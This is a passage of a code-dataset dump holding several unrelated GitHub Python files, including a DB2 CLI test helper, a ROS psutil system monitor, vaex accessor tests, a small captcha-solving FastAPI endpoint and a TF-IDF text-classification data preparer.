self.encode_utf8(perrorMsg.value))\n\n def InstanceDetach(self):\n \"\"\"helper function to detach db2 instance\n uses sqledtin : Removes the logical instance attachment, and terminates the physical communication \n connection if there are no other logical connections using this layer.\n \"\"\"\n _sqlca = sqlca()\n rc = self.mDb2_Cli.libcli64.sqledtin_api(byref(_sqlca))\n if rc != SQL_RC_OK:\n mylog.error(\"InstanceDetach '%s'\" % _sqlca)\n self.get_sqlca_errormsg(_sqlca)\n else:\n mylog.debug(\"Detach SQL_RC_OK\")\n\n return rc\n\n def setParameter_int(self, cfgParameter, token, in_int, flags=0):\n \"\"\"helper function to fill an integer parameter\n\n Parameters\n ----------\n\n cfgParameters : :class:`db2ApiDef.db2CfgParam`\n token : :class:`ctypes.c_uint32`\n in_int : :class:`ctypes.c_int`\n\n \"\"\"\n cfgParameter.flags = flags\n cfgParameter.ptrvalue = cast(addressof(in_int), POINTER_T(c_char))\n cfgParameter.token = token\n\n def getDB2_USER(self):\n return self.mDb2_Cli.my_dict['DB2_USER'].upper()\n\n def getDB2_DATABASE(self):\n return self.mDb2_Cli.my_dict['DB2_DATABASE'].upper()\n\n def setDB2Version(self):\n \"\"\"set DB2 Version on some structures parameters, to tell DB2 \n that the structures passed were generated by version SQL_REL10100\n \"\"\"\n #if platform.system() == 'Darwin':\n # because db2ApiDef was generated using DB2 10.01 aka 10.1\n # I have to hard code ver SQL_REL10100 as the header file\n # of the structures generated are bound to DB2 10.1, it will crash on 11.1 if I specify 11.1 as the\n # struct I am passing dont match 11.1 specs\n #\n self.SQL_REL10100 = 10010000 \n self.db2Version = self.SQL_REL10100\n mylog.info(\"I am hardcoding the db2 version as SQL_REL10100\")\n\n def check_sqlca(self, _sqlca, func_name):\n if _sqlca.sqlcode != SQL_RC_OK:\n mylog.error(\"\"\"\nfunc_name '%s' \nsqlca %s\nsqlca.sqlcode '%s'\n\"\"\" % (func_name,\n _sqlca,\n self.getsqlcode(_sqlca.sqlcode)))\n self.get_sqlca_errormsg(_sqlca)\n else:\n mylog.debug(\"\"\"func_name %s SQL_RC_OK\"\"\" % func_name)\n\n def getsqlcode(self, sqlcode):\n \"\"\"helper function to return literal string of error sqlcode\n browse the file db2_clu_constants.py dict and if it finds a match with the error code sqlcode\n returns the string representing that error, like 0 is SQL_RC_OK, return string \"SQL_RC_OK\"\n\n Parameters\n ----------\n sqlcode : :obj:`int`\n\n Returns\n -------\n :obj:`str`\n\n \"\"\"\n for key in db2_clu_constants.__dict__:\n if db2_clu_constants.__dict__[key] == sqlcode:\n mylog.debug(\"key %s type %s\" % (key, type(key)))\n #return \"%s\" % self.encode_utf8(key)\n return \"%s\" % key\n return \"\"\n\n def __getattr__(self, name):\n \"\"\"helper function to check if instance self.mDb2_Cli has the attribute being accessed\n if it does then I use it. next I try the self instance, if not found error out. \n \"\"\"\n if hasattr(self.mDb2_Cli, name):\n return getattr(self.mDb2_Cli, name)\n if hasattr(self.mDb2_Cli.libcli64, name):\n return getattr(self.mDb2_Cli.libcli64, name)\n else:\n raise AttributeError(\"%s\\n or %s\\n doesnt have attribute %s\" % (self, self.mDb2_Cli, name))\n\n def check_udfsrv_present(self):\n\n mylog.info(\"DB2PATH '%s' \" % self.mDb2_Cli.my_dict['DB2PATH'])\n if platform.system() == \"Darwin\":\n udfsrv = \"udfsrv\"\n function = \"FUNCTION\"\n elif platform.system() == \"Windows\":\n udfsrv = \"udfsrv.dll\"\n function = \"FUNCTION\"\n else:\n udfsrv = \"udfsrv\"\n function = \"function\"\n udfsrv_path = os.path.join(self.mDb2_Cli.my_dict['DB2PATH'], function, udfsrv)\n\n if not os.path.exists(udfsrv_path):\n mylog.error(\"\\nudfsrv_path '%s' \\nfile not present we cant run udfcli functions\" % udfsrv_path)\n return -1\n return 0\n\n def check_spserver(self):\n if platform.system() == \"Darwin\":\n spserver = \"spserver\"\n function = \"FUNCTION\"\n elif platform.system() == \"Windows\":\n spserver = \"spserver.dll\"\n function = \"FUNCTION\"\n else:\n spserver = \"spserver\"\n function = \"function\"\n spserver_path = os.path.join(self.mDb2_Cli.my_dict['DB2PATH'], function, spserver)\n\n if not os.path.exists(spserver_path):\n mylog.error(\"\\nspserver_path '%s' \\nfile not present we cant run spserver functions\" % spserver_path)\n return -1\n return 0\n\n def run_statement(self, sql_str):\n\n #allocate the handle for statement 1 \n clirc = self.mDb2_Cli.libcli64.SQLAllocHandle(SQL_HANDLE_STMT,\n self.mDb2_Cli.hdbc,\n byref(self.hstmt))\n self.mDb2_Cli.STMT_HANDLE_CHECK(self.hstmt, self.mDb2_Cli.hdbc, clirc,\"SQL_HANDLE_STMT SQLAllocHandle\")\n str_list = sql_str.split(\"@\")\n\n for sql_1 in str_list:\n if sql_1.strip() == \"\":\n continue\n #if '--' in sql_1:\n # continue\n\n try:\n self.stmt = c_char_p(self.encode_utf8(sql_1))\n mylog.debug(\"\\n'%s'\\n\" % sql_1)\n \n cliRC = self.mDb2_Cli.libcli64.SQLExecDirect(self.hstmt, self.stmt, SQL_NTS)\n self.mDb2_Cli.STMT_HANDLE_CHECK(self.hstmt, self.mDb2_Cli.hdbc, cliRC,\"SQLExecDirect\")\n clirc = self.mDb2_Cli.libcli64.SQLEndTran(SQL_HANDLE_DBC, self.mDb2_Cli.hdbc, SQL_COMMIT)\n\n\n except Exception as i:\n if \"is an undefined name.\" in str(i):\n mylog.warning(\"executing %s\\nerror\\n%s\\n\" % (sql_1, str(i)))\n continue\n mylog.error(\"\\n%s\\n\" % sql_1)\n\n\n #clirc = self.mDb2_Cli.libcli64.SQLEndTran(SQL_HANDLE_DBC, self.mDb2_Cli.hdbc, SQL_COMMIT)\n # free the statement handle\n clirc = self.mDb2_Cli.libcli64.SQLFreeHandle(SQL_HANDLE_STMT, self.hstmt)\n self.mDb2_Cli.STMT_HANDLE_CHECK(self.hstmt, self.mDb2_Cli.hdbc, clirc,\"SQL_HANDLE_STMT SQLFreeHandle\")\n return 0","repo_name":"asierra01/ibm_db_test","sub_path":"cli_test_cases/cli_test_common_class.py","file_name":"cli_test_common_class.py","file_ext":"py","file_size_in_byte":11756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22982516665","text":"from typing import List\nfrom typing import Optional\n\nimport psutil\nimport rclpy.publisher\nimport std_msgs.msg\nfrom builtin_interfaces.msg import Time as TimeMsg\n\nfrom oasis_drivers.system.network_utils import NetworkUtils\nfrom oasis_drivers.system.system_types import Battery\nfrom oasis_drivers.system.system_types import DiskPartition\nfrom oasis_drivers.system.system_types import NetworkAddress\nfrom oasis_drivers.system.system_types import NetworkInterface\nfrom oasis_msgs.msg import DiskPartition as DiskPartitionMsg\nfrom oasis_msgs.msg import NetworkAddress as NetworkAddressMsg\nfrom oasis_msgs.msg import NetworkInterface as NetworkInterfaceMsg\nfrom oasis_msgs.msg import SystemTelemetry as SystemTelemetryMsg\n\n\nclass SystemMonitor:\n \"\"\"\n Utility class for interacting with psutil, the cross-platform library for\n retrieving process and system information.\n\n Reports the following data:\n\n - CPU percent\n - CPU frequency\n - CPU temperature\n - Memory utilization\n - Disk utilization\n - Network I/O\n\n Reports the following state:\n\n - CPU counts\n - CPU frequencies\n - Memory configuration\n - Disk configuration\n - Network addresses\n \"\"\"\n\n @classmethod\n def read_psutil(\n cls, telemetry_pub: rclpy.publisher.Publisher, timestamp: TimeMsg, frame_id: str\n ) -> None:\n # Read information from psutil\n bootstrap_time = float(psutil.boot_time())\n cpu_percent = float(psutil.cpu_percent())\n cpu_temperature = cls._read_cpu_temperature()\n cpu_frequency_ghz = cls._read_cpu_frequency_ghz()\n cpu_logical_core_count = int(psutil.cpu_count(logical=True))\n\n #\n # psutil.cpu_count() can return None on RPi because /proc/cpuinfo has a\n # different format and psutil doesn't want to play guessing games.\n #\n # See:\n #\n # https://github.com/giampaolo/psutil/issues/1078\n #\n try:\n cpu_physical_core_count = int(psutil.cpu_count(logical=False))\n except TypeError:\n cpu_physical_core_count = cpu_logical_core_count\n\n memory_percent = float(psutil.virtual_memory().percent)\n disk_partitions = cls._get_disk_partitions()\n network_interfaces = cls._get_network_interfaces()\n battery = cls._get_battery()\n\n # Timestamp in ROS header\n header = std_msgs.msg.Header()\n header.stamp = timestamp\n header.frame_id = frame_id\n\n # Create the message\n telemetry_msg = SystemTelemetryMsg()\n\n # Populate the message\n telemetry_msg.header = header\n telemetry_msg.bootstrap_time = bootstrap_time\n telemetry_msg.cpu_percent = cpu_percent\n if cpu_temperature is not None:\n telemetry_msg.cpu_temperature = cpu_temperature\n if cpu_frequency_ghz is not None:\n telemetry_msg.cpu_frequency_ghz = cpu_frequency_ghz\n telemetry_msg.cpu_physical_core_count = cpu_physical_core_count\n telemetry_msg.cpu_logical_core_count = cpu_logical_core_count\n telemetry_msg.memory_percent = memory_percent\n for partition in disk_partitions:\n disk_partition_msg = DiskPartitionMsg()\n disk_partition_msg.device_name = partition.device_name\n disk_partition_msg.filesystem = partition.filesystem\n disk_partition_msg.mount_point = partition.mount_point\n disk_partition_msg.mount_options = partition.mount_options\n disk_partition_msg.disk_total = partition.disk_total\n disk_partition_msg.disk_used = partition.disk_used\n disk_partition_msg.disk_free = partition.disk_free\n disk_partition_msg.disk_percent = partition.disk_percent\n telemetry_msg.disk_partitions.append(disk_partition_msg)\n for interface in network_interfaces:\n network_interface_msg = NetworkInterfaceMsg()\n network_interface_msg.name = interface.name\n network_interface_msg.provider = interface.provider\n network_interface_msg.bytes_sent = interface.bytes_sent\n network_interface_msg.bytes_received = interface.bytes_received\n for address in interface.addresses:\n network_address_msg = NetworkAddressMsg()\n network_address_msg.family = address.family\n network_address_msg.address = address.address\n network_address_msg.netmask = address.netmask\n network_interface_msg.addresses.append(network_address_msg)\n telemetry_msg.network_interfaces.append(network_interface_msg)\n if battery is not None:\n telemetry_msg.has_battery = True\n telemetry_msg.battery_percent = battery.battery_percent\n telemetry_msg.battery_remaining_mins = battery.battery_remaining_time\n telemetry_msg.power_plugged = battery.power_plugged\n else:\n telemetry_msg.has_battery = False\n\n # Publish the message\n telemetry_pub.publish(telemetry_msg)\n\n @staticmethod\n def _read_cpu_temperature() -> Optional[float]:\n for sensor, shwtemps in psutil.sensors_temperatures().items():\n # We only care about the core temperature for now\n if sensor != \"coretemp\":\n continue\n\n for shwtemp in shwtemps:\n label = str(shwtemp.label)\n temperature = float(shwtemp.current)\n\n # TODO\n if label == \"Package id 0\":\n return temperature\n\n return None\n\n @staticmethod\n def _read_cpu_frequency_ghz() -> Optional[float]:\n freq = psutil.cpu_freq()\n\n if freq:\n return float(freq.current) / 1000.0\n\n return None\n\n @staticmethod\n def _get_disk_partitions() -> List[DiskPartition]:\n disk_partitions = []\n\n for partition in psutil.disk_partitions():\n mount_point = str(partition.mountpoint)\n disk_usage = psutil.disk_usage(mount_point)\n\n # Skip snap mounts\n if mount_point.startswith(\"/snap\"):\n continue\n\n disk_partitions.append(\n DiskPartition(\n device_name=str(partition.device),\n filesystem=str(partition.fstype),\n mount_point=mount_point,\n mount_options=str(partition.opts),\n disk_total=int(disk_usage.total),\n disk_used=int(disk_usage.used),\n disk_free=int(disk_usage.free),\n disk_percent=float(disk_usage.percent),\n )\n )\n\n return disk_partitions\n\n @classmethod\n def _get_network_interfaces(cls) -> List[NetworkInterface]:\n net_io_counters = psutil.net_io_counters(pernic=True)\n net_addresses = psutil.net_if_addrs()\n\n interfaces = [\n NetworkInterface(\n name=interface,\n provider=cls._get_interface_provider(interface),\n bytes_sent=int(netio.bytes_sent),\n bytes_received=int(netio.bytes_recv),\n addresses=[\n NetworkAddress(\n family=NetworkUtils.get_network_address_family(snicaddr.family),\n address=str(snicaddr.address),\n netmask=str(snicaddr.netmask) if snicaddr.netmask else \"\",\n )\n for snicaddr in net_addresses[interface]\n ],\n )\n for interface, netio in net_io_counters.items()\n if interface != \"lo\"\n ]\n\n return interfaces\n\n @staticmethod\n def _get_interface_provider(interface_name: str) -> str:\n # TODO\n return \"\"\n\n @staticmethod\n def _get_battery() -> Optional[Battery]:\n battery = psutil.sensors_battery()\n\n if battery:\n return Battery(\n battery_percent=float(battery.percent),\n battery_remaining_time=float(battery.secsleft) / 60.0,\n power_plugged=bool(battery.power_plugged),\n )\n\n return None\n","repo_name":"eigendude/OASIS","sub_path":"oasis_drivers_py/oasis_drivers/system/system_monitor.py","file_name":"system_monitor.py","file_ext":"py","file_size_in_byte":8175,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"31312744568","text":"def getReplyMarkupCommand(command) :\n\n commands = [\"/about_feyorra\" , \"/about_feyorra@FeyorraBot\" , \"/locked_tokens\" , \"/locked_tokens@FeyorraBot\" , \"/latest\" , \"/latest@FeyorraBot\" , \"/liquidity_mining\" , \"/liquidity_mining@FeyorraBot\" ,\"/verify_stake\" , \"/verify_stake@FeyorraBot\" , \"/stake\" , \"/stake@FeyorraBot\" , \"/exchanges\" , \"/exchanges@FeyorraBot\" , \"/contract\" , \"/contract@FeyorraBot\" ]\n\n for i in range(0,16) :\n\n if commands[i] == command :\n\n return commands[i]\n\n return 0 \n","repo_name":"shadoowC1/Crypto-Assistant-Bot","sub_path":"getReplyMarkupCommand.py","file_name":"getReplyMarkupCommand.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17078832802","text":"import vaex\nimport pytest\n\n\nclass Foo(object):\n def __init__(self, df):\n self.df = df\n\n\nclass Spam(object):\n def __init__(self, df):\n self.df = df\n\n\nclass Egg(object):\n def __init__(self, spam):\n self.spam = spam\n self.df = spam.df\n\n\ndef test_accessor_basic():\n vaex._add_lazy_accessor('foo', lambda: Foo)\n df = vaex.example()\n assert isinstance(df.foo, Foo)\n assert df.foo is df.foo\n assert df.foo.df is df\n\n\ndef test_accessor_expression():\n vaex._add_lazy_accessor('foo', lambda: Foo, vaex.expression.Expression)\n df = vaex.example()\n assert isinstance(df.x.foo, Foo)\n assert df.x.foo is df.x.foo\n assert df.x.foo.df is df.x\n\ndef test_accessor_nested():\n df = vaex.example()\n vaex._add_lazy_accessor('spam.egg', lambda: Egg)\n with pytest.raises(expected_exception=AttributeError):\n a = df.spam\n vaex._add_lazy_accessor('spam.egg.foo', lambda: Foo)\n with pytest.raises(expected_exception=AttributeError):\n a = df.spam\n vaex._add_lazy_accessor('spam', lambda: Spam)\n assert df.spam is df.spam\n assert df.spam.df is df\n assert isinstance(df.spam, Spam)\n\n assert df.spam.egg is df.spam.egg\n assert df.spam.egg.spam is df.spam\n assert isinstance(df.spam.egg, Egg)\n\n assert df.spam.egg.foo is df.spam.egg.foo\n assert df.spam.egg.foo.df is df.spam.egg # abuse of foo\n assert isinstance(df.spam.egg.foo, Foo)\n","repo_name":"vaexio/vaex","sub_path":"tests/internal/accessor_test.py","file_name":"accessor_test.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":8057,"dataset":"github-code","pt":"53"} +{"seq_id":"72458089767","text":"\"\"\"\"\nkl\n\"\"\"\nimport uvicorn\nfrom fastapi import FastAPI, UploadFile, File\n\nfrom src.captcha_cracker import CaptchaCracker\n\ncracker = CaptchaCracker()\napi = FastAPI()\n\n\n@api.post('/crack')\nasync def crack(file: UploadFile = File(...)):\n image_bytes = await file.read()\n return {\"captcha_solution\": cracker.crack(image_bytes=image_bytes)}\n\n\nif __name__ == '__main__':\n uvicorn.run(api, host='0.0.0.0', port=80)\n","repo_name":"nsaintgeours/captchacracker","sub_path":"model/src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71518885287","text":"#Start of minesweeper code\ndef minesweeper(n):\n arr = [[0 for row in range(n)] for column in range(n)]\n for row in arr:\n print(\" \".join(str(cell) for cell in row))\n print(\"\")\n\n\ngrid_size = input(\"Size of grid\")\n\nminesweeper(int(grid_size))\n\nimport random\n\nprint(\"Hello\")","repo_name":"Leonhest/git_practice","sub_path":"minesweeper.py","file_name":"minesweeper.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29310722897","text":"import os\nimport bz2\nimport _pickle as cPickle\nimport json\nfrom json import JSONEncoder\n\nimport numpy as np\n\n\nclass FileEncoder(JSONEncoder):\n def default(self, o):\n # if type(o) == np.ndarray:\n # return o.tolist()\n return o.__dict__\n\n\nclass File:\n\n def __init__(self, meta):\n self.save_dir = os.getcwd()\n self.meta = meta\n self.save_dir_was_changed = False\n\n def is_save_dir_default(self):\n return not self.save_dir_was_changed\n\n def set_save_dir(self, directory):\n self.save_dir = directory\n self.save_dir_was_changed = True\n\n def get_save_dir(self):\n if self.save_dir is None:\n return os.getcwd()\n return self.save_dir\n\n def file_exists(self, filename):\n return filename in self.get_filenames_in_folder()\n\n def get_filenames_in_folder(self):\n return os.listdir(self.get_save_dir())\n\n def get_filename(self, slice_num, location_num, record_num, extension, path=None):\n\n fn = self.pad_zero(slice_num) + '-' \\\n + self.pad_zero(location_num) + '-' \\\n + self.pad_zero(record_num) + extension\n if not fn.endswith(extension):\n fn = fn.split(\".\")[0] + extension\n if path is None or len(path) == 0:\n return fn\n return path + '\\\\' + fn\n\n @staticmethod\n def pad_zero(i, dst_len=2):\n s = str(i)\n if len(s) < dst_len:\n return '0' + s\n return s\n\n @staticmethod\n def retrieve_python_object_from_json(filename):\n try:\n f = open(filename)\n obj = json.load(f)\n if type(obj) == str:\n obj = json.loads(obj)\n f.close()\n return obj\n except Exception as e:\n print(\"could not load file:\", filename)\n print(e)\n\n @staticmethod\n def dump_python_object_to_json(filename, obj):\n with open(filename, 'w') as f:\n json.dump(obj, f, cls=FileEncoder)\n\n @staticmethod\n def retrieve_python_object_from_pickle(filename):\n try:\n data = bz2.BZ2File(filename, 'rb')\n return cPickle.load(data)\n except Exception as e:\n print(\"could not load file:\", filename)\n print(e)\n\n @staticmethod\n def dump_python_object_to_pickle(filename, obj):\n with bz2.BZ2File(filename, 'w') as f:\n cPickle.dump(obj, f)\n\n @staticmethod\n def strip_path(filename):\n return filename.split(\"/\")[-1].split(\"\\\\\")[-1]\n\n @staticmethod\n def decompose_filename(filename):\n parts = filename.split('.')\n if len(parts) != 2:\n return []\n filename, ext = parts\n if ext not in ['npy', 'json']:\n return []\n parts = filename.split('-')\n if len(parts) != 3:\n return [filename, ext]\n if all([i.isnumeric() for i in parts]):\n return [int(i) for i in parts] + [ext]\n return [filename, ext]\n\n def get_data_filenames_in_folder(self, data_ext='.npy', meta_ext='.json'):\n files = self.get_filenames_in_folder()\n ret_files = []\n for f in files:\n if f.endswith(data_ext) and f.split('.')[0] + meta_ext in files:\n ret_files.append(f)\n return ret_files\n","repo_name":"john-judge/PhotoLib","sub_path":"pyPhoto21/database/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20749614912","text":"# Import standard modules\nimport sys\nimport pickle\nfrom math import log\nfrom math import pow\n\n# Import necessary modules\nfrom Tokenizer import Tokenizer\n\n#===========================================================================#\n# PREPARING THE DATASET FOR TEXT CLASSIFICATION\n# Executes the text normalization phase\n#===========================================================================#\nclass DataPrepper():\n def __init__(self, PATH_TO_STOP_WORDS, PATH_TO_TRAIN_LIST):\n self.PATH_TO_STOP_WORDS = PATH_TO_STOP_WORDS\n self.PATH_TO_CLASS_LIST = PATH_TO_TRAIN_LIST\n self.Tokenizer = Tokenizer(self.PATH_TO_STOP_WORDS)\n\n # Set up class-specific constants\n self.fpc = self.load_paths_to_training_text() # F.P.C means filename_path_classnames\n self.class_names = self.get_class_names()\n\n print(\"[DataPrepper] Instantiated!\")\n\n \"\"\"\n Processes the dataset and returns the feature vectors of each of the training\n and test sets (positively and negatively classified)\n\n Note:\n train_pos_doc_map = datasets[0][0]\n train_neg_doc_map = datasets[0][1]\n test_pos_doc_map = datasets[1][0]\n test_neg_doc_map = datasets[1][1]\n \"\"\"\n def run(self, class_name, cross_validation_mode=False):\n print(\"[DataPrepper] Running for\", class_name, \", prepping datasets...\")\n\n datasets = None\n if cross_validation_mode:\n datasets = self.prep_dataset(class_name, 1.0, 1.0)\n else:\n datasets = self.prep_dataset(class_name, 0.8, 0.9)\n\n print(\"Sample sizes - Train: %d positives + %d negatives, Test: %d positives + %d negatives\" %\n (len(datasets[0][0]), len(datasets[0][1]), len(datasets[1][0]), len(datasets[1][1])))\n\n # Text normalization: tokenization, stop word removal & stemming\n print(\"[DataPrepper] Tokenizing datasets...\")\n datasets_df_pair = self.tokenize_datasets(datasets)\n datasets = datasets_df_pair[0]\n doc_freq_map = datasets_df_pair[1]\n\n # Construct df from datasets\n doc_freq_map = self.cull_doc_freq(doc_freq_map, 50)\n print(\"Num of words in vocabs: Vocab=%d\" % len(doc_freq_map.keys()))\n print(\"Num of words in vocabs: Culled Vocab=%d\" % len(doc_freq_map.keys()))\n\n N_docs = len(datasets[0][0]) + len(datasets[0][1]) + len(datasets[1][0]) + len(datasets[1][1])\n datasets = self.setup_tfidf_vector(N_docs, datasets, doc_freq_map)\n\n # === FOR DEBUGGING ===\n # tryA = datasets[0][0][list(datasets[0][0].keys())[0]]\n # tryB = datasets[0][1][list(datasets[0][1].keys())[0]]\n # tryC = datasets[1][0][list(datasets[1][0].keys())[0]]\n # tryD = datasets[1][1][list(datasets[1][1].keys())[0]]\n # print('---SEE WHAT FEATURE VECTORS LOOK LIKE FOR %s---' % class_name)\n # print('try A:', tryA, 'dim:', len(tryA))\n # print('try B:', tryB, 'dim:', len(tryB))\n # print('try C:', tryC, 'dim:', len(tryC))\n # print('try D:', tryD, 'dim:', len(tryD))\n # print('---END SEE WHAT FEATURE VECTORS LOOK LIKE---')\n\n f_vector_pos_train = self.setup_feature_vectors_for_classifier(datasets[0][0])\n f_vector_neg_train = self.setup_feature_vectors_for_classifier(datasets[0][1])\n f_vector_pos_test = []\n f_vector_neg_test = []\n if cross_validation_mode:\n f_vector_pos_test = self.setup_feature_vectors_for_classifier(datasets[1][0])\n f_vector_neg_test = self.setup_feature_vectors_for_classifier(datasets[1][1])\n\n return [[f_vector_pos_train, f_vector_neg_train], [f_vector_pos_test, f_vector_neg_test], doc_freq_map]\n\n #===========================================================================#\n # TEXT NORMALIZATION\n # Functions to facilitate text normalization for all datasets\n #===========================================================================#\n def tokenize_datasets_OLD(self, datasets):\n for i in range(len(datasets)):\n for j in range(len(datasets[i])):\n dict_class_documents = datasets[i][j]\n\n for doc_name in dict_class_documents.keys():\n dict_class_documents[doc_name] = \\\n self.Tokenizer.tokenize(dict_class_documents[doc_name])\n return datasets\n\n def tokenize_datasets(self, datasets):\n doc_freq_map = {}\n\n for i in range(len(datasets)):\n for j in range(len(datasets[i])):\n dict_class_documents = datasets[i][j]\n\n for doc_name in dict_class_documents.keys():\n dict_class_documents[doc_name] = self.Tokenizer.tokenize(dict_class_documents[doc_name])\n\n # Construct doc freq map on-the-fly\n tokens_processed_before = []\n for token in dict_class_documents[doc_name]:\n if token not in tokens_processed_before: # unique tokens in a doc\n tokens_processed_before.append(token)\n if token not in doc_freq_map.keys(): # if token is newly found, initialize\n doc_freq_map[token] = [doc_name]\n else:\n doc_freq_map[token].append(doc_name) # since the word appears in this doc\n\n return [datasets, doc_freq_map]\n\n #===========================================================================#\n # TF-IDF VECTORIZATION\n # Compute TF-IDF vectors for every document\n #===========================================================================#\n def setup_tfidf_vector(self, NUM_DOCS, datasets, doc_freq_map):\n vocab = list(doc_freq_map.keys())\n\n for i in range(len(datasets)):\n for j in range(len(datasets[i])):\n dict_class_documents = datasets[i][j]\n\n for doc_name in dict_class_documents.keys():\n doc = dict_class_documents[doc_name]\n f_vector = [0] * len(vocab)\n\n for token in doc:\n if token in vocab:\n tf = doc.count(token)\n log_tf = (1 + log(tf)) if tf > 0 else 0.0\n log_idf = log(NUM_DOCS / len(doc_freq_map[token]))\n w = log_tf * log_idf\n f_vector[vocab.index(token)] = w\n\n dict_class_documents[doc_name] = f_vector\n\n return datasets\n\n def cull_doc_freq(self, doc_freq_map, threshold_num_docs):\n culled_df_map = {}\n for word in doc_freq_map.keys():\n if len(doc_freq_map[word]) > threshold_num_docs:\n culled_df_map[word] = doc_freq_map[word]\n return culled_df_map\n\n #===========================================================================#\n # CONSTRUCT VOCABULARY & DOC FREQ MAP\n # Set up data structures that hold the vocab and doc freq of every word\n #===========================================================================#\n def setup_vocab(self, dataset, threshold):\n count_vocab = {}\n vocab = []\n for doc_name in dataset.keys():\n for token in dataset[doc_name]:\n if token not in count_vocab.keys():\n count_vocab[token] = 0\n else:\n count_vocab[token] += 1\n\n if token not in vocab and count_vocab[token] >= threshold:\n vocab.append(token)\n\n return vocab\n\n \"\"\"\n Sets up the doc frequency of words in a given dataset.\n A dataset is a dictionary of this format: { 'doc_name' : ['Here', 'are', ...] }\n\n Returns a dictionary containing the document frequency of all words in the\n chosen dataset in this format: { 'Here' : 12, 'are' : 56 ... }\n \"\"\"\n def setup_doc_freq(self, dataset):\n df = {}\n\n for doc_name in dataset.keys():\n for word in dataset[doc_name]:\n if word not in df.keys():\n df[word] = [doc_name]\n else:\n if doc_name not in df[word]:\n df[word].append(doc_name)\n\n return df\n\n def get_chisq_vocab(self, data_pos_vocab, data_neg_vocab, docs_pos, docs_neg, threshold):\n combined_vocabs = self.union_vocabs(data_pos_vocab, data_neg_vocab)\n N_pos_docs = len(docs_pos.keys())\n N_neg_docs = len(docs_neg.keys())\n\n feature_selected_vocab = []\n for word in (combined_vocabs):\n N_pos_docs_containing_word = self.get_num_contains_word(docs_pos, word)\n N_pos_docs_not_containing_word = N_pos_docs - N_pos_docs_containing_word\n\n N_neg_docs_containing_word = self.get_num_contains_word(docs_neg, word)\n N_neg_docs_not_containing_word = N_neg_docs - N_neg_docs_containing_word\n\n # no. of training docs that:\n N_00 = N_neg_docs_not_containing_word # in negative class, do not contain w\n N_01 = N_pos_docs_not_containing_word # in positive class, do not contain w\n N_10 = N_neg_docs_containing_word # in negative class, contain w\n N_11 = N_pos_docs_containing_word # in positive class, contain w\n\n chisq = 0\n if not (N_00 == 0 and N_01 == 0):\n chisq = ((N_11 + N_10 + N_01 + N_00) * pow(N_11 * N_00 - N_10 * N_01, 2)) / \\\n ((N_11 + N_01) * (N_11 + N_10) * (N_10 + N_00) * (N_01 + N_00))\n\n if chisq > threshold:\n feature_selected_vocab.append(word)\n\n return feature_selected_vocab\n\n def get_num_contains_word(self, df, word):\n docs_containing_word = []\n for doc_name in df.keys():\n if word in df[doc_name]:\n docs_containing_word.append(doc_name)\n return len(docs_containing_word)\n\n def union_vocabs(self, vocab_1, vocab_2):\n unioned_vocab = []\n for word in vocab_1:\n if word not in unioned_vocab:\n unioned_vocab.append(word)\n for word in vocab_2:\n if word not in unioned_vocab:\n unioned_vocab.append(word)\n return unioned_vocab\n\n #===========================================================================#\n # CONSTRUCT FEATURE VECTORS FOR EACH CLASS\n # Compute feature vectors representing each class' text document\n #===========================================================================#\n def setup_feature_vectors(self, vocab, dataset):\n fea_datasets = []\n dataset_f_vectors = []\n\n for doc_name in dataset.keys():\n doc = dataset[doc_name]\n DOC_N = len(doc)\n f_vector = [0] * len(vocab)\n\n # Count word occurrence with reference to vocab\n for word in doc:\n if word in vocab:\n f_vector[vocab.index(word)] += 1\n\n # Normalize by the number of words in a document\n for k in range(len(f_vector)):\n f_vector[k] = f_vector[k] / DOC_N\n\n # Finished processing a feature vector of a doc\n dataset_f_vectors.append(f_vector)\n\n return dataset_f_vectors\n\n \"\"\"\n Stack map of {'doc_name': [1.81, 0, 6.8...] ... } into a list of feature vectors\n \"\"\"\n def setup_feature_vectors_for_classifier(self, doc_tfidf_vector_map):\n f_vectors = []\n for doc_name in doc_tfidf_vector_map.keys():\n f_vectors.append(doc_tfidf_vector_map[doc_name])\n return f_vectors\n\n #===========================================================================#\n # CONSTRUCT THE DATASET\n # Retrieves texts from training and test files\n #===========================================================================#\n \"\"\"\n Prepares the datasets we will need for training and testing.\n Splits our corpus into positive and negative train/test sets.\n\n Returns a list of 2 pairs of tuples - one for train & test set, where each\n tuple contains 2 dictionaries - one for positives & negatives\n \"\"\"\n def prep_dataset(self, positive_class_name, pos_frac, neg_frac_per_class):\n positives_fpc = self.get_texts_for_class(positive_class_name)\n N_pos_docs = len(positives_fpc)\n\n negatives_fpc_map = {}\n N_neg_docs = 0\n\n # Set up a dictionary containing { 'neg_class_name': [['53886', 'path_to_doc', 'c2'], [...] ...] }\n for class_name in self.class_names:\n if not (class_name == positive_class_name):\n negatives_fpc_map[class_name] = self.get_texts_for_class(class_name)\n N_neg_docs += 1\n\n # Split the positive classes into train and test sets\n N_pos_train = int(N_pos_docs * pos_frac)\n N_pos_test = int(N_pos_docs * (1 - pos_frac))\n\n positives = self.sample_N_pos_texts(positives_fpc, N_pos_train)\n train_positives = positives[0]\n test_positives = positives[1]\n\n # Sample and split the negatives classes into train and test sets\n negatives = self.sample_N_neg_texts(negatives_fpc_map, neg_frac_per_class)\n train_negatives = negatives[0]\n test_negatives = negatives[1]\n\n return [[train_positives, train_negatives], [test_positives, test_negatives]]\n\n \"\"\"\n Reads the train-class-list or test-class-list file to retrieve all the\n paths to each document\n\n Returns a list of 3-tuples in the format:\n [[doc_name, path_to_doc, class_name], ...]\n \"\"\"\n def load_paths_to_training_text(self):\n filepath_class_file = open(self.PATH_TO_CLASS_LIST, 'r')\n filepath_class_lines = filepath_class_file.readlines()\n\n filename_path_classnames = []\n for ln in filepath_class_lines:\n 